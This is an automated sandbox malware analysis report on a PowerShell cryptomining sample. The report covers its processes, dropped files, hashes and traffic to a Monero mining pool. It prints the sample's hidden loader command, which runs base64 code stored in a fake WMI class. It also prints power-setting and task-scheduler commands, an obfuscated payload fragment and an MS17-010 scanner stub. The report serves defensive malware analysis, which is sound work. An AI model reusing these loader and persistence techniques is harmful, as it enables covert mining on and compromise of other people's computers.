Automated Malware Analysis Report for In3.Ps1

ID: 43655 Sample Name: in3.ps1 Cookbook: default.jbs Time: 04:05:00 Date: 24/01/2018 Version: 20.0.0 Table of Contents

Table of Contents 2 Analysis Report 4 Overview 4 General Information 4 Detection 4 Confidence 5 Classification 5 Analysis Advice 5 Signature Overview 6 AV Detection: 6 Networking: 6 Boot Survival: 6 Persistence and Installation Behavior: 6 Data Obfuscation: 6 Spreading: 6 System Summary: 6 HIPS / PFW / Operating System Protection Evasion: 7 Anti Debugging: 7 Malware Analysis System Evasion: 7 Hooking and other Techniques for Hiding and Protection: 7 Language, Device and Operating System Detection: 7 Behavior Graph 7 Simulations 8 Behavior and APIs 8 Antivirus Detection 8 Initial Sample 8 Dropped Files 8 Domains 8 Yara Overview 9 Initial Sample 9 PCAP (Network Traffic) 9 Dropped Files 9 Memory Dumps 9 Unpacked PEs 9 Joe Sandbox View / Context 9 IPs 9 Domains 9 ASN 9 Dropped Files 9 Screenshot 9 Startup 10 Created / dropped Files 10 Contacted Domains/Contacted IPs 14 Contacted Domains 14 Contacted IPs 14 Static File Info 15 General 15 File Icon 15 Network Behavior 15 Network Port Distribution 15 TCP Packets 15 UDP Packets 16 DNS Queries 16

Copyright Joe Security LLC 2018 Page 2 of 26 DNS Answers 16 Code Manipulations 16 Statistics 16 Behavior 16 System Behavior 16 Analysis Process: powershell.exe PID: 3084 Parent PID: 2836 16 General 16 File Activities 17 File Created 17 File Deleted 17 File Written 17 Registry Activities 19 Key Value Created 19 Analysis Process: schtasks.exe PID: 3356 Parent PID: 3084 20 General 20 Analysis Process: powercfg.exe PID: 3368 Parent PID: 3084 20 General 20 Analysis Process: powercfg.exe PID: 3376 Parent PID: 3084 20 General 20 Analysis Process: powercfg.exe PID: 3384 Parent PID: 3084 20 General 20 Analysis Process: NETSTAT.EXE PID: 3392 Parent PID: 3084 21 General 21 File Activities 21 Analysis Process: csc.exe PID: 3416 Parent PID: 3084 21 General 21 File Activities 21 Analysis Process: cvtres.exe PID: 3424 Parent PID: 3416 21 General 21 File Activities 22 Analysis Process: NETSTAT.EXE PID: 3440 Parent PID: 3084 22 General 22 File Activities 22 Analysis Process: powershell.exe PID: 3464 Parent PID: 3084 22 General 22 File Activities 22 File Created 22 File Deleted 23 File Written 23 Analysis Process: csc.exe PID: 3552 Parent PID: 3464 25 General 25 Analysis Process: cvtres.exe PID: 3564 Parent PID: 3552 26 General 26 Analysis Process: NETSTAT.EXE PID: 3596 Parent PID: 3084 26 General 26 Disassembly 26 Code Analysis 26

Overview

General Information

Joe Sandbox Version: 20.0.0 Analysis ID: 43655 Start time: 04:05:00 Joe Sandbox Product: CloudBasic Start date: 24.01.2018 Overall analysis duration: 0h 5m 57s Hypervisor based Inspection enabled: false Report type: light Sample file name: in3.ps1 Cookbook file name: default.jbs Analysis system description: Windows 7 SP1 (with Office 2010 SP2, IE 11, FF 54, Chrome 60, Acrobat Reader DC 17, Flash 26, Java 8.0.1440.1) Number of analysed new started processes analysed: 19 Number of new started drivers analysed: 0 Number of existing processes analysed: 0 Number of existing drivers analysed: 0 Number of injected processes analysed: 0 Technologies HCA enabled EGA enabled HDC enabled Detection: MAL Classification: mal80.evad.troj.winPS1@25/21@1/1 HCA Information: Successful, ratio: 100% Number of executed functions: 0 Number of non-executed functions: 0 EGA Information: Failed HDC Information: Failed Cookbook Comments: Found application associated with file extension: .ps1 Warnings: Show All Exclude process from analysis (whitelisted): WmiPrvSE.exe, WmiApSrv.exe, conhost.exe, dllhost.exe Report size exceeded maximum capacity and may have missing behavior information. Report size getting too big, too many NtAllocateVirtualMemory calls found. Report size getting too big, too many NtOpenKeyEx calls found. Report size getting too big, too many NtQueryValueKey calls found. Skipping Hybrid Code Analysis (implementation is based on Java, .Net, VB or Delphi, or parses a document) for: powershell.exe, csc.exe, powershell.exe, csc.exe

Detection

Strategy Score Range Reporting Detection

Threshold 80 0 - 100 Report FP / FN

Strategy Score Range Further Analysis Required? Confidence

Threshold 5 0 - 5 false

Classification

Ransomware

Miner Spreading

mmaallliiiccciiioouusss

malicious

Evader Phishing

sssuusssppiiiccciiioouusss

suspicious

cccllleeaann

clean

Exploiter Banker

Spyware Trojan / Bot

Adware

Analysis Advice

Sample drops PE files which have not been started, submit dropped PE samples for a secondary analysis to Joe Sandbox

• AV Detection • Networking • Boot Survival • Persistence and Installation Behavior • Data Obfuscation • Spreading • System Summary • HIPS / PFW / Operating System Protection Evasion • Anti Debugging • Malware Analysis System Evasion • Hooking and other Techniques for Hiding and Protection • Language, Device and Operating System Detection

Click to jump to signature section

AV Detection:

Antivirus detection for submitted file

Networking:

Performs DNS lookups

Detected TCP or UDP traffic on non-standard ports

Uses netstat to query active network connections and open ports

Boot Survival:

Uses schtasks.exe or at.exe to add and modify task schedules

Persistence and Installation Behavior:

Drops PE files

Data Obfuscation:

Compiles C# or VB.Net code

Suspicious powershell command line found

Spreading:

Creates COM task schedule object (often to register a task for autostart)

Enumerates the file system

System Summary:

Uses Microsoft Silverlight

Submission file is bigger than most known malware samples

Uses new MSVCR Dlls

Binary contains paths to debug symbols

Classification label

Creates files inside the user directory

Creates temporary files

Found command line output Copyright Joe Security LLC 2018 Page 6 of 26 Parts of this applications are using the .NET runtime (Probably coded in C#)

Queries process information (via WMI, Win32_Process)

Reads ini files

Reads software policies

Sample is known by Antivirus (Virustotal or Metascan)

Spawns processes

Uses an in-process (OLE) Automation server

Creates mutexes

PE file does not import any functions

Reads the hosts file

Powershell connects to network

Uses powercfg.exe to modify the power settings

HIPS / PFW / Operating System Protection Evasion:

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Anti Debugging:

Creates guard pages, often used to prevent reverse engineering and debugging

Checks for kernel debuggers (NtQuerySystemInformation(SystemKernelDebuggerInformation))

Enables debug privileges

Malware Analysis System Evasion:

Queries a list of all running processes

Enumerates the file system

Found dropped PE file which has not been started or loaded

May sleep (evasive loops) to hinder dynamic analysis

Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)

Hooking and other Techniques for Hiding and Protection:

Disables application error messsages (SetErrorMode)

System process connects to network (likely due to code injection or exploit)

Language, Device and Operating System Detection:

Queries the cryptographic machine GUID

Queries the installation date of Windows

Queries the volume information (name, serial number etc) of a device

Behavior Graph

ID: 43655 Legend:

Sample: in3.ps1 Process

Startdate: 24/01/2018 Architecture: WINDOWS Signature Score: 80 Created File

Detected TCP or UDP Antivirus detection Suspicious powershell DNS/IP Info traffic on non-standard 3 other signatures started for submitted file command line found ports Is Dropped

powershell.exe Is Windows Process

Number of created Registry Values 1 12 Number of created Files

Queries sensitive network adapter information Suspicious powershell Visual Basic (via WMI, Win32_NetworkAdapter, started started started command line found often done to detect virtual machines) Delphi

powershell.exe NETSTAT.EXE csc.exe Java

6 other processes .Net C# or VB.NET 13 3 C, C++ or other language

xmr-eu1.nanopool.org Is malicious 5.196.23.240, 14444, 49165 dropped dropped OVHFR France

started unknown, ASCII C:\Users\user\AppData\Local\...\rjax4qnu.dll, PE32 started

System process connects Detected TCP or UDP to network (likely due Powershell connects traffic on non-standard to code injection or to network ports exploit)

csc.exe cvtres.exe

dropped

C:\Users\user\AppData\Local\...\oyswbnum.dll, PE32 started

cvtres.exe

Simulations

Behavior and APIs

Time Type Description 04:05:17 API Interceptor 187x Sleep call for process: powershell.exe modified from: 60000ms to: 100ms

Antivirus Detection

Initial Sample

Source Detection Cloud Link in3.ps1 25% virustotal Browse

Dropped Files

No Antivirus matches

Domains

Yara Overview

Initial Sample

No yara matches

PCAP (Network Traffic)

No yara matches

Dropped Files

No yara matches

Memory Dumps

No yara matches

Unpacked PEs

No yara matches

Joe Sandbox View / Context

IPs

No context

Domains

No context

ASN

No context

Dropped Files

No context

Screenshot

System is w7 powershell.exe (PID: 3084 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -noLogo -ExecutionPolicy unrestricted -file 'C:\Users\user\Desktop\in3.ps1' MD5: 92F44E405DB16AC55D97E3BFE3B132FA) schtasks.exe (PID: 3356 cmdline: 'C:\Windows\system32\schtasks.exe' /delete /tn yastcat /f MD5: 2003E9B15E1C502B146DAD2E383AC1E3) powercfg.exe (PID: 3368 cmdline: 'C:\Windows\system32\powercfg.exe' /CHANGE -standby-timeout-ac 0 MD5: 98E7E971AB21A6EDD2323C0FB37B9A0F) powercfg.exe (PID: 3376 cmdline: 'C:\Windows\system32\powercfg.exe' /CHANGE -hibernate-timeout-ac 0 MD5: 98E7E971AB21A6EDD2323C0FB37B9A0F) powercfg.exe (PID: 3384 cmdline: 'C:\Windows\system32\powercfg.exe' -SetAcValueIndex 381b4222-f694-41f0-9685-ff5bb260df2e 4f971e89-eebd-4455-a8de-9e59040e7347 5ca83367-6e45-459f-a27b-476b1d01c936 000 MD5: 98E7E971AB21A6EDD2323C0FB37B9A0F) NETSTAT.EXE (PID: 3392 cmdline: 'C:\Windows\system32\NETSTAT.EXE' -anop tcp MD5: 32297BB17E6EC700D0FC869F9ACAF561) csc.exe (PID: 3416 cmdline: 'C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\rjax4qnu.cmdline' MD5: 0A1C81BDCB030222A0B0A652B2C89D8D) cvtres.exe (PID: 3424 cmdline: C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\HERBBL ~1\AppData\Local\Temp\RES27A9.tmp' 'c:\Users\user\AppData\Local\Temp\CSC278A.tmp' MD5: 200FC355F85ECD4DB77FB3CAB2D01364) NETSTAT.EXE (PID: 3440 cmdline: 'C:\Windows\system32\NETSTAT.EXE' -anop tcp MD5: 32297BB17E6EC700D0FC869F9ACAF561) powershell.exe (PID: 3464 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -NoP -NonI -W Hidden '$mon = ([WmiClass] 'root\default:Office_Updater' ).Properties['mon'].Value;$funs = ([WmiClass] 'root\default:Office_Updater').Properties['funs'].Value ;iex ([System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64Stri ng($funs)));Invoke-Command -ScriptBlock $RemoteScriptBlock -ArgumentList @($mon, $mon, 'Void', 0, '', '')' MD5: 92F44E405DB16AC55D97E3BFE3B132FA) csc.exe (PID: 3552 cmdline: 'C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\oyswbnum.cmdline' MD5: 0A1C81BDCB030222A0B0A652B2C89D8D) cvtres.exe (PID: 3564 cmdline: C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\HERBBL ~1\AppData\Local\Temp\RES760E.tmp' 'c:\Users\user\AppData\Local\Temp\CSC75BC.tmp' MD5: 200FC355F85ECD4DB77FB3CAB2D01364) NETSTAT.EXE (PID: 3596 cmdline: 'C:\Windows\system32\NETSTAT.EXE' -anop tcp MD5: 32297BB17E6EC700D0FC869F9ACAF561) cleanup

Created / dropped Files

Copyright Joe Security LLC 2018 Page 10 of 26 C:\Users\HERBBL~1\AppData\Local\Temp\RES27A9.tmp File Type: data Size (bytes): 2064 Entropy (8bit): 2.423613257714554 Encrypted: false MD5: 927D038C64CEA66482AFA677C82DAF51 SHA1: 9A32E620E8D6304DE70B0936567C9E7F2D713A8F SHA-256: 4FAA5DDFB32BE482108B1D2A79C26C07C470F4D2DEF23B5A197067A52E3E0A0E SHA-512: 8F0E13F4C8BC63B44CA869E65577B89BA137F4D56BF1C11F086D6ED3E2E6678692AD1E47767D72EAECACFF5754 88BE5E51FFF339A03F7EB4CDAAB1E6D03F39B1 Malicious: false Reputation: low

C:\Users\HERBBL~1\AppData\Local\Temp\RES760E.tmp File Type: data Size (bytes): 2064 Entropy (8bit): 2.4141749278482907 Encrypted: false MD5: 7A474218BD4F476ED92D26B126EBDCF0 SHA1: 98DE35CBBC45CDF8AFC6A165DFD671D2CCD42A60 SHA-256: 06065CDA30F91AD2C0CA5F5BD71063C8420146D9D7FCCD47390688AF729950C4 SHA-512: CB865F0895316C88F7836F2E804E6ED86C8092F264C093B5DCC39C8844160AC9DCE8A012DEFFA035A81D03A11E B4D893200BEC5C9DD0989F992E32547C649912 Malicious: false Reputation: low

C:\Users\user\AppData\Local\Temp\CSC278A.tmp File Type: MSVC .res Size (bytes): 652 Entropy (8bit): 3.1032118609720056 Encrypted: false MD5: 1DC6466168ABDB9110FCDD83DADD6F50 SHA1: 26C992C087A55E3D47259F9B0893AA8762AD4777 SHA-256: 81F6C716656DCA362067B213EA0E8317240F2A7DCD2679BBEF6D369BC43043F3 SHA-512: B70A9E277408F8B322DDC1D357E797A20DF68734FFBDC0B703E386D5AB5E80E4EE66A728DA02CA4CBBFA0378E 7EAFEF5147E0D063771B0094706EBE8D446E891 Malicious: false Reputation: low

C:\Users\user\AppData\Local\Temp\CSC75BC.tmp File Type: MSVC .res Size (bytes): 652 Entropy (8bit): 3.0922747231331877 Encrypted: false MD5: 68F8D1329C0DA5ACC9E8346D75091E03 SHA1: C65101453DE9A7299DE3F4414776EFAFEBDA6CC6 SHA-256: 6C90A8C7F20E8DDE07C5B892F0C61B232C384480C43B5628EEA474A9BE402487 SHA-512: 456261F6673E7313497C358C4ABFA1378262C54D7B91A39565EFE83942124BD5DD0C57566B1A4F087553488C46930 D86D88CCDC8411350882F673D3E2A89B5BC Malicious: false Reputation: low

C:\Users\user\AppData\Local\Temp\oyswbnum.0.cs File Type: UTF-8 Unicode (with BOM) text, with CRLF line terminators Size (bytes): 5826 Entropy (8bit): 4.9118391565359545 Encrypted: false MD5: BE45C5DB7A9A66F35401E2B00BBDB856 SHA1: 354DC7D3F4D6F80359B0BA99081C0B6705F49480 SHA-256: 1CEEFFDD10ECE58A1B0F298BF4BD2CA65E1EF5CD50248F89F89870E21C7E5E3B SHA-512: A33F9D0FCA8ED8513CB9F16155C124C3259C56D7C8B90B6376095672288852B275B2ECA7006D7CB1A45A5EBE600 075D459DFF71C21C181B26D0E66034AB0DF4F Malicious: false Reputation: low

C:\Users\user\AppData\Local\Temp\oyswbnum.cmdline File Type: UTF-8 Unicode (with BOM) text, with very long lines, with no line terminators

Copyright Joe Security LLC 2018 Page 11 of 26 C:\Users\user\AppData\Local\Temp\oyswbnum.cmdline Size (bytes): 327 Entropy (8bit): 5.27318065753439 Encrypted: false MD5: EA4DA1BF55F3671A53FF6F74EDF4C9A8 SHA1: E368BEC9625DD399BBD9D06E9677817FE20EA689 SHA-256: A72635BD6630F9F5837B67FD30EE0EC820EC64C10DD16E1C77B66B26FE4F424C SHA-512: E26A35C1B70F0B816A415C40A3582E65BE28AFDB6CA765C7049FCC3674FFC8AAE854D44146E14465AC818AD67D E8F88F0152A04A44738CBD2E1751FACDB47A9C Malicious: false Reputation: low

C:\Users\user\AppData\Local\Temp\oyswbnum.dll File Type: PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows Size (bytes): 6656 Entropy (8bit): 4.218026044231743 Encrypted: false MD5: 6A0F2C890C628D0803C0B96F50C80ED9 SHA1: 0F562FB8C8A03B81C9EB93152273A1228AC460C0 SHA-256: 4F4ACA1FF2861E962A710E6FFBB585F7103D823FCF96C79E1A0073542103D889 SHA-512: 9E770DFEE67FD219C42D12E32A2FDAC42EABA80FD5F3F3546DBAEF54BE2E2703A29037B17F025BEEB1FD00648 81BC1184F61AC13A8D2E64E50F489AE655DD188 Malicious: false Reputation: low

C:\Users\user\AppData\Local\Temp\oyswbnum.out File Type: ASCII text, with CRLF line terminators Size (bytes): 198 Entropy (8bit): 4.894444435447009 Encrypted: false MD5: 182738883BFDFB548627BEC18305C7EE SHA1: FD5A8D41B96844985C0DC21116CFA689CED8AABE SHA-256: 5026CA6D4A10F43342AC0AD1E7536686D1E32DE5EAA6E9478BDA11FCA1B78622 SHA-512: 9A029DF52BAE31B8E69BADECA6AD4A8DA19D12557EDFCC2A85DD0C85EBEA9090E79CAD09DC4DCF9D905D736 28FA41FDD7D0A2577D4B4A716DA0A6EEA02ADF3D0 Malicious: false Reputation: low

C:\Users\user\AppData\Local\Temp\oyswbnum.pdb File Type: data Size (bytes): 25005 Entropy (8bit): 1.6142161546330653 Encrypted: false MD5: 664854096D1C6D77F067F8465395AC25 SHA1: D9426E4795BC8E95C0387A95CA5C61B1E734B866 SHA-256: B58FC894BBF40120563E257C1CF872AA019683D7A08809C8C12EFCCAD090F991 SHA-512: 884A5E0265840134C8D0A960A7DE0F4FF7F736A1D52B5B3F513854637D106559E2DF2D8828A76C2F91DCFEA7D20 5CCE13BAA9EDAE2E4A054A80C067F1A0BB0A5 Malicious: false Reputation: low

C:\Users\user\AppData\Local\Temp\rjax4qnu.0.cs File Type: UTF-8 Unicode (with BOM) text, with CRLF line terminators Size (bytes): 5826 Entropy (8bit): 4.9118391565359545 Encrypted: false MD5: BE45C5DB7A9A66F35401E2B00BBDB856 SHA1: 354DC7D3F4D6F80359B0BA99081C0B6705F49480 SHA-256: 1CEEFFDD10ECE58A1B0F298BF4BD2CA65E1EF5CD50248F89F89870E21C7E5E3B SHA-512: A33F9D0FCA8ED8513CB9F16155C124C3259C56D7C8B90B6376095672288852B275B2ECA7006D7CB1A45A5EBE60 0075D459DFF71C21C181B26D0E66034AB0DF4F Malicious: false Reputation: low

C:\Users\user\AppData\Local\Temp\rjax4qnu.cmdline File Type: UTF-8 Unicode (with BOM) text, with very long lines, with no line terminators Size (bytes): 327

Copyright Joe Security LLC 2018 Page 12 of 26 C:\Users\user\AppData\Local\Temp\rjax4qnu.cmdline Entropy (8bit): 5.337652007275668 Encrypted: false MD5: FBBECDED4237D6D968AB6F63D4ED1AF8 SHA1: 0E51A762F7C860A0A2DDD291FA933F4F3197F3AA SHA-256: D3CA342B07621A1683692977DC64355F09099E8EDD5811704FF488B3B8B4ACA0 SHA-512: 5F10C8B6669E2108C6852A23B0D5EF4FC379E1264C058139B7D8F26F519AD6E5399BDA052D9B7FEF0F5EA198047 1AB5907CDCC3FB06C7B9262880DF9C4D1A4EC Malicious: false Reputation: low

C:\Users\user\AppData\Local\Temp\rjax4qnu.dll File Type: PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows Size (bytes): 6656 Entropy (8bit): 4.225769101851168 Encrypted: false MD5: 3B28DD0B534D180BBA0AC5BDA4752105 SHA1: E143343B330B7BC88290D20E95A0CED1346BD2BB SHA-256: 8B5276B2F47F565E02494E9E19C36E35809189D0F3D908CF6DD69B1711D8BAB9 SHA-512: CAF5CF31DBCE06D4BD09AD849FC70348931E6A7D68960D2C018988A8A7CA76DBCAF91074453C08A0B3E5E73E8 5E0D65385453A5833AFA91EFD4E38C11D1CBD84 Malicious: false Reputation: low

C:\Users\user\AppData\Local\Temp\rjax4qnu.out File Type: ASCII text, with CRLF line terminators Size (bytes): 198 Entropy (8bit): 4.894444435447009 Encrypted: false MD5: 182738883BFDFB548627BEC18305C7EE SHA1: FD5A8D41B96844985C0DC21116CFA689CED8AABE SHA-256: 5026CA6D4A10F43342AC0AD1E7536686D1E32DE5EAA6E9478BDA11FCA1B78622 SHA-512: 9A029DF52BAE31B8E69BADECA6AD4A8DA19D12557EDFCC2A85DD0C85EBEA9090E79CAD09DC4DCF9D905D736 28FA41FDD7D0A2577D4B4A716DA0A6EEA02ADF3D0 Malicious: false Reputation: low

C:\Users\user\AppData\Local\Temp\rjax4qnu.pdb File Type: data Size (bytes): 25005 Entropy (8bit): 1.6174196680285136 Encrypted: false MD5: C358AFBC3D4424EA00140A14E00C9B3F SHA1: EF19D4610988F8CC7A0FB575BAA1AA57CE92C5E5 SHA-256: 7E991ABE150A9333811A870D5A348D64EEF2C7FFC77FA778BC22D4F691409EF2 SHA-512: FE71EA77CE35DC7F690FDC4207B50A498F5C58CA59D5E8630C3B6D22A1C2C5AC0C7E50F97A180EA2D3B055E9C 4B49E62B696DCF91DB990D737B9F0E0012E42C1 Malicious: false Reputation: low

C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\64QXU9TVGGU3OQHE5F7D.temp File Type: data Size (bytes): 8016 Entropy (8bit): 3.5764246316706374 Encrypted: false MD5: B849D88D6662229F28EC2F011BCEBDDC SHA1: 09B8F87CCA07102998468AA8BEB79947DF1F26F7 SHA-256: AE67A28CC5DE7F765D4A55011A662C92B67AC87E3349F3B843932EB676ECE128 SHA-512: 0043CF3C7DB5E186A0B5D770854B76B3CC8797104024D2EB976598167D49A4A852088B5D11C95376ACFA0C560AE F9117EBA0D79416AA516EA19BA7714A0B5211 Malicious: false Reputation: low

C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\DEAK7SA58B6AXIB1VI01.temp File Type: data Size (bytes): 8016 Entropy (8bit): 3.5764246316706374

Copyright Joe Security LLC 2018 Page 13 of 26 C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\DEAK7SA58B6AXIB1VI01.temp Encrypted: false MD5: B849D88D6662229F28EC2F011BCEBDDC SHA1: 09B8F87CCA07102998468AA8BEB79947DF1F26F7 SHA-256: AE67A28CC5DE7F765D4A55011A662C92B67AC87E3349F3B843932EB676ECE128 SHA-512: 0043CF3C7DB5E186A0B5D770854B76B3CC8797104024D2EB976598167D49A4A852088B5D11C95376ACFA0C560AE F9117EBA0D79416AA516EA19BA7714A0B5211 Malicious: false Reputation: low

unknown

File Type: ASCII text, with CRLF line terminators Size (bytes): 778 Entropy (8bit): 3.4756022370268416 Encrypted: false MD5: 10C68DB33AE59065AA87C180AE7DFEAB SHA1: 36F6BAF7E0274B0EEDB98D58C1492383FC5840B4 SHA-256: F069614379B512142D132CAD14FD4C63EB225056C2E3E1633104DE429F4DC224 SHA-512: BA41E52D5C18B6B5CBD0A2438C49024BF15E7E1054A0E2805DE074AFEF283CD4C86E8E12340A23B3BAC4C0174 39AD993AA4679789FEB743C2D9C75F9D7B0CDF1 Malicious: true Reputation: low

Contacted Domains/Contacted IPs

Contacted Domains

Name IP Active Malicious Antivirus Detection xmr-eu1.nanopool.org 5.196.23.240 true true 0%, virustotal, Browse

Contacted IPs

No. of IPs < 25% 25% < No. of IPs < 50% 50% < No. of IPs < 75% 75% < No. of IPs

IP Country Flag ASN ASN Name Malicious 5.196.23.240 France 16276 OVHFR true

General

File type: ASCII text, with very long lines, with no line terminators Entropy (8bit): 5.648116609140601 TrID: File name: in3.ps1 File size: 3766940 MD5: 9d2c27a1a6e18b0b815c938e05c03e7b SHA1: 4ef882b05566dc706fbc604b1bf771e8c7dab86a SHA256: f6e75f0346425209c92217da882fca45d7004e683c8122a 48a7b3bcec5356e1d SHA512: d9b56bc6f495ff0bc417c79e1a69268ebaeac4a9e034b6a 0490024eb90f669f3f065dde251feeca1d71d9d021176e9 76bdd7eb4021b886d4494d76884a34d25c File Content Preview: $fa='SLTAH+6B8AAAA5+HXvWItYJEwB+2aLDEuLWB xMAfuLBItMAfheWVvDUjHAmazByg0BwoXAdfaSWsN VU1dWQVdJiyhMi30IUl5MicsxwEQPIsBIiQKJwUj30Um JwLBAUMHgBlBJiQFIg+wgv+qZblfoZf///0iDxDCFwHVF SIs+SI01TQAAALkABgAA86RIi0XwSItAGEiLQCBIiwB mg3hIGHX2SItQUIF6DDMAMgB16UyLeCC/XlFeg+gi

File Icon

Network Behavior

Network Port Distribution

Total Packets: 6 • 14444 undefined • 53 (DNS)

TCP Packets

Timestamp Source Port Dest Port Source IP Dest IP Jan 24, 2018 04:07:21.389946938 CET 63266 53 192.168.2.2 8.8.8.8 Jan 24, 2018 04:07:21.815835953 CET 53 63266 8.8.8.8 192.168.2.2 Jan 24, 2018 04:07:21.896513939 CET 49165 14444 192.168.2.2 5.196.23.240 Jan 24, 2018 04:07:21.896553040 CET 14444 49165 5.196.23.240 192.168.2.2 Jan 24, 2018 04:07:21.896683931 CET 49165 14444 192.168.2.2 5.196.23.240 Jan 24, 2018 04:07:21.899632931 CET 49165 14444 192.168.2.2 5.196.23.240 Jan 24, 2018 04:07:21.899658918 CET 14444 49165 5.196.23.240 192.168.2.2 Jan 24, 2018 04:07:41.785490036 CET 14444 49165 5.196.23.240 192.168.2.2 Jan 24, 2018 04:07:41.984119892 CET 14444 49165 5.196.23.240 192.168.2.2 Jan 24, 2018 04:07:41.984252930 CET 49165 14444 192.168.2.2 5.196.23.240

Timestamp Source Port Dest Port Source IP Dest IP Jan 24, 2018 04:07:21.389946938 CET 63266 53 192.168.2.2 8.8.8.8 Jan 24, 2018 04:07:21.815835953 CET 53 63266 8.8.8.8 192.168.2.2

DNS Queries

Timestamp Source IP Dest IP Trans ID OP Code Name Type Class Jan 24, 2018 04:07:21.389946938 CET 192.168.2.2 8.8.8.8 0xd87d Standard query xmr-eu1.na A (IP address) IN (0x0001) (0) nopool.org

DNS Answers

Timestamp Source IP Dest IP Trans ID Replay Code Name CName Address Type Class Jan 24, 2018 8.8.8.8 192.168.2.2 0xd87d No error (0) xmr-eu1.na 5.196.23.240 A (IP address) IN (0x0001) 04:07:21.815835953 nopool.org CET

Code Manipulations

Statistics

Behavior

• powershell.exe • schtasks.exe • powercfg.exe • powercfg.exe • powercfg.exe • NETSTAT.EXE • csc.exe • cvtres.exe • NETSTAT.EXE • powershell.exe • csc.exe • cvtres.exe • NETSTAT.EXE

Click to jump to process

System Behavior

Analysis Process: powershell.exe PID: 3084 Parent PID: 2836

General

Start time: 04:05:14 Start date: 24/01/2018 Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Wow64 process (32bit): false Commandline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -noLogo -ExecutionPolicy unres tricted -file 'C:\Users\user\Desktop\in3.ps1' Imagebase: 0x755c0000

Copyright Joe Security LLC 2018 Page 16 of 26 File size: 452608 bytes MD5 hash: 92F44E405DB16AC55D97E3BFE3B132FA Programmed in: .Net C# or VB.NET Reputation: low

File Activities

File Created

Source File Path Access Attributes Options Completion Count Address Symbol C:\Users\user\AppData\Local\Temp\rjax4qnu.tmp read attributes none synchronous io success or wait 1 1A1072F CreateFileW and synchroniz non alert and n e and generic on directory file write and open no recall C:\Users\user\AppData\Local\Temp\rjax4qnu.0.cs read attributes none synchronous io success or wait 1 1A1072F CreateFileW and synchroniz non alert and n e and generic on directory file write and open no recall C:\Users\user\AppData\Local\Temp\rjax4qnu.dll read attributes none synchronous io success or wait 1 1A1072F CreateFileW and synchroniz non alert and n e and generic on directory file read and and open no generic write recall C:\Users\user\AppData\Local\Temp\rjax4qnu.cmdline read attributes none synchronous io success or wait 1 1A1072F CreateFileW and synchroniz non alert and n e and generic on directory file write and open no recall C:\Users\user\AppData\Local\Temp\rjax4qnu.out read attributes none synchronous io success or wait 1 1A1072F CreateFileW and synchroniz non alert and n e and generic on directory file write and open no recall C:\Users\user\AppData\Local\Temp\rjax4qnu.err read attributes none synchronous io success or wait 1 1A1072F CreateFileW and synchroniz non alert and n e and generic on directory file write and open no recall

File Deleted

Source File Path Completion Count Address Symbol C:\Users\user\AppData\Local\Temp\rjax4qnu.cmdline success or wait 1 1A101D2 DeleteFileW C:\Users\user\AppData\Local\Temp\rjax4qnu.dll success or wait 1 1A101D2 DeleteFileW C:\Users\user\AppData\Local\Temp\rjax4qnu.tmp success or wait 1 1A101D2 DeleteFileW C:\Users\user\AppData\Local\Temp\rjax4qnu.pdb success or wait 1 1A101D2 DeleteFileW C:\Users\user\AppData\Local\Temp\rjax4qnu.err success or wait 1 1A101D2 DeleteFileW C:\Users\user\AppData\Local\Temp\rjax4qnu.0.cs success or wait 1 1A101D2 DeleteFileW C:\Users\user\AppData\Local\Temp\rjax4qnu.out success or wait 1 1A101D2 DeleteFileW

Source Old File Path New File Path Completion Count Address Symbol

File Written

Source File Path Offset Length Value Ascii Completion Count Address Symbol

Copyright Joe Security LLC 2018 Page 17 of 26 Source File Path Offset Length Value Ascii Completion Count Address Symbol C:\Users\user\AppData\Local\Temp\rjax4qnu.0.cs unknown 4096 ef bb bf 75 73 69 6e 67 ...using System;..using success or wait 1 1A108E7 WriteFile 20 53 79 73 74 65 6d System 3b 0d 0a 75 73 69 6e .Collections.Generic;..usin 67 20 53 79 73 74 65 g S 6d 2e 43 6f 6c 6c 65 ystem.Diagnostics;..using 63 74 69 6f 6e 73 2e System.IO;..using 47 65 6e 65 72 69 63 System.Net;..using 3b 0d 0a 75 73 69 6e System.Net.Sockets;..usin 67 20 53 79 73 74 65 g 6d 2e 44 69 61 67 6e System.Text;....namespac 6f 73 74 69 63 73 3b e PingCastle.Scanners.. 0d 0a 75 73 69 6e 67 {...public class m17sc... 20 53 79 73 74 65 6d {....static public bool 2e 49 4f 3b 0d 0a 75 Scan(stri 73 69 6e 67 20 53 79 73 74 65 6d 2e 4e 65 74 3b 0d 0a 75 73 69 6e 67 20 53 79 73 74 65 6d 2e 4e 65 74 2e 53 6f 63 6b 65 74 73 3b 0d 0a 75 73 69 6e 67 20 53 79 73 74 65 6d 2e 54 65 78 74 3b 0d 0a 0d 0a 6e 61 6d 65 73 70 61 63 65 20 50 69 6e 67 43 61 73 74 6c 65 2e 53 63 61 6e 6e 65 72 73 0d 0a 7b 0d 0a 09 70 75 62 6c 69 63 20 63 6c 61 73 73 20 6d 31 37 73 63 0d 0a 09 7b 0d 0a 09 09 73 74 61 74 69 63 20 70 75 62 6c 69 63 20 62 6f 6f 6c 20 53 63 61 6e 28 73 74 72 69 C:\Users\user\AppData\Local\Temp\rjax4qnu.0.cs unknown 1730 64 65 72 20 3d 20 6e der = new success or wait 1 1A108E7 